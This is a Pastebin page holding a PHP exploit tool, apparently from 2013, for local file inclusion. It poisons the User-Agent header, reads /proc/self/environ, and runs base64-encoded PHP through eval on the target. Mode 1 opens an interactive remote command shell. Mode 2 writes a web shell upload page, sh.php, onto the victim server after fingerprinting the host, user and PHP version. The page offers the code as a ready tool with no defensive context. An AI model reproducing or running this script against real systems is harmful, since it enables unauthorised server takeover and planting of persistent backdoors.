Advertisement
The-UnKn0wN

LFI Exploit for BHR - Reverse Shell / Upload form spawn

Jan 15th, 2013
1,742
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.36 KB | None | 0 0
  1. <?php
  2. // Video tutorial : http://youtu.be/IDSP2768jEQ
  3. // If you are using BHR put this file in /toos/webapp folder.
  4. // BHR Download link => www.mediafire.com/?h0c5i3gqzbql345 (For windows only)
  5. /*
  6. !LFI_Exploit
  7. @ HOST = localhost = Target URL
  8. @ PORT = 80 = Target PORT
  9. @ PATH = / = Web site path
  10. @ PAGE = ../../../proc/self/environ%00 = Vulnerable Page
  11. @ MODE = 1 = Exploiting Mode
  12.  */
  13. error_reporting(0);
  14. ini_set("default_socket_timeout", 20);
  15.  
  16. function http_send($host, $port, $path, $page, $cmd)
  17. {
  18.     if (!($sock = fsockopen($host, $port)))
  19.         die("\n[-] No response from {$host}:{$port}\n");
  20.        
  21.         $packet  = "GET {$path}{$page} HTTP/1.0\r\n";
  22.         $packet .= "Host: {$host}\r\n";
  23.         $packet .= "User-Agent: Mozilla/5.0 UPBHR ".$cmd." UPBHR\r\n";
  24.         $packet .= "Connection: Close\r\n\r\n";
  25.     fputs($sock, $packet);
  26.     $data = stream_get_contents($sock);
  27.     if(!preg_match("#UPBHR#",$data))
  28.     {
  29.     die("[-] Cannot exploit the target.\n");
  30.     }
  31.     $resp = explode("UPBHR",$data);
  32.     return $resp[1];
  33. }
  34. print "\n+-----------------------[ The Crazy3D Team ]--------------------------+";
  35. print "\n| LFI Exploit Tool for BHR                                            |";
  36. print "\n|                                by The UnKn0wN                       |";
  37. print "\n|     Greets to : The Crazy3D's members and all Algerian h4x0rs       |";
  38. print "\n+---------------------------------------------------------------------+";
  39. print "\n| Mode 1: reverse shell connexion                                     |";
  40. print "\n| Mode 2: spawn an upload form                                        |";
  41. print "\n+---------------------------------------------------------------------+";
  42. print "\n|                       www.RPG-Exploit.com                           |";
  43. print "\n+---------------------------------------------------------------------+\n";
  44. $host = $argv[1];
  45. $port = $argv[2];
  46. $path = $argv[3];
  47. $page = $argv[4];
  48. $mode = $argv[5];
  49. $tcmd="ZXJyb3JfcmVwb3J0aW5nKDApOyAkZnAgPSBwb3BlbignaG9zdG5hbWUnLCdyJyk7IHdoaWxlKCFmZW9mKCRmcCkpIHsgJHJlc3VsdCAuPSBmcmVhZCgkZnAsMTAyNCk7IH07cGNsb3NlKCRmcCk7IHByaW50ICRyZXN1bHQ7";
  50. print "\n[+] Hostname    :  " .http_send($host,$port, $path, $page,"<?php eval(base64_decode('$tcmd')) ?>");
  51. print "\n[+] ServerIP    :  " .http_send($host,$port, $path, $page,"<?php echo \$_SERVER['SERVER_ADDR']; ?>");
  52. $tcmd="ZXJyb3JfcmVwb3J0aW5nKDApOyAkZnAgPSBwb3BlbignaWQnLCdyJyk7IHdoaWxlKCFmZW9mKCRmcCkpIHsgJHJlc3VsdCAuPSBmcmVhZCgkZnAsMTAyNCk7IH07cGNsb3NlKCRmcCk7IHByaW50ICRyZXN1bHQ7";
  53. print "\n[+] UserID      :  " .http_send($host,$port, $path, $page,"<?php eval(base64_decode('$tcmd')) ?>");
  54. print "\n[+] PHP Version :  " .http_send($host,$port, $path, $page,"<?php echo phpversion(); ?>");
  55. print "\n[+] Script PATH :  " .http_send($host,$port, $path, $page,"<?php echo \$_SERVER['SCRIPT_FILENAME']; ?>")."\n";
  56.  
  57. switch ($mode)
  58. {
  59. case 2:
  60. $tcmd="JGg9Zm9wZW4oJ3NoLnBocCcsICd3Jyk7ZndyaXRlKCRoLCc8P3BocCBldmFsKGJhc2U2NF9kZWNvZGUoImFXWW9hWE56WlhRb0pGOVFUMU5VV3lKMWNHeHZZV1FpWFNrcGV5UmpiMjUwWlc1MFgyUnBjaUE5SUNJdUx5STdKSFJ0Y0Y5bWFXeGxJRDBnSkY5R1NVeEZVMXNpWm1samFHbGxjaUpkV3lKMGJYQmZibUZ0WlNKZE8ybG1LQ0ZwYzE5MWNHeHZZV1JsWkY5bWFXeGxLQ1IwYlhCZlptbHNaU2twZTJWNGFYUW9Ja3hsSUdacFkyaHBaWElnWlhOMElHbHVkSEp2ZFhaaFlteGxJaWs3ZlNSMGVYQmxYMlpwYkdVZ1BTQWtYMFpKVEVWVFd5Sm1hV05vYVdWeUlsMWJJblI1Y0dVaVhUc2tibUZ0WlY5bWFXeGxJRDBnSkY5R1NVeEZVMXNpWm1samFHbGxjaUpkV3lKdVlXMWxJbDA3YVdZb0lXMXZkbVZmZFhCc2IyRmtaV1JmWm1sc1pTZ2tkRzF3WDJacGJHVXNKR052Ym5SbGJuUmZaR2x5TGlSdVlXMWxYMlpwYkdVcEtYdGxlR2wwS0NKSmJYQnZjM05wWW14bElHUmxJR052Y0dsbGNpQnNaU0JtYVdOb2FXVnlJR1JoYm5NZ0pHTnZiblJsYm5SZlpHbHlJaWs3ZlgwZ1B6NDhabTl5YlNCdFpYUm9iMlE5SWxCUFUxUWlJR0ZqZEdsdmJqMGlJeUlnWlc1amRIbHdaVDBpYlhWc2RHbHdZWEowTDJadmNtMHRaR0YwWVNJK1BHbHVjSFYwSUhSNWNHVTlJbVpwYkdVaUlHNWhiV1U5SW1acFkyaHBaWElpSUhOcGVtVTlJak13SWo0OGFXNXdkWFFnZEhsd1pUMGljM1ZpYldsMElpQnVZVzFsUFNKMWNHeHZZV1FpSUhaaGJIVmxQU0pWY0d4dllXUmxjaUkrUEM5bWIzSnRQZz09IikpID8+Jyk7";
  61. http_send($host,$port, $path, $page,"<?php eval(base64_decode('$tcmd')) ?>");
  62. print "[+] done. Check {$host}{$path}sh.php\n";
  63. break;
  64. default:
  65. while(1)
  66. {
  67.     print "\nBHR@{$host}# ";
  68.     if (($cmd = trim(fgets(STDIN))) == "exit") break;
  69. $cmd = base64_encode('error_reporting(0); $fp = popen(\''.$cmd.'\',\'r\'); while(!feof($fp)) { $result .= fread($fp,1024); };pclose($fp); print $result;');
  70.     print "\n\n ".http_send($host,$port, $path, $page,"<?php eval(base64_decode('".$cmd."')); ?>");
  71. }
  72. break;
  73. }
  74. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement